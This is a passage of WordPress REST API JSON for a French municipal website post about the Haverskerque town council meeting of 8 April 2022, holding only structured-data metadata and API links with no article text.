!*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/04\/09\/conseil-municipal-du-08-avril-2022\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/04\/09\/conseil-municipal-du-08-avril-2022\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","datePublished":"2022-04-09T11:14:00+00:00","dateModified":"2024-07-29T04:38:48+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/04\/09\/conseil-municipal-du-08-avril-2022\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2022\/04\/09\/conseil-municipal-du-08-avril-2022\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/04\/09\/conseil-municipal-du-08-avril-2022\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Conseil Municipal du 08 Avril 2022"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/581","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=581"}],"version-history":[{"count":6,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/581\/revisions"}],"predecessor-version":[{"id":8300,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/581\/revisions\/8300"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/568"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=581"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=581"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=581"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}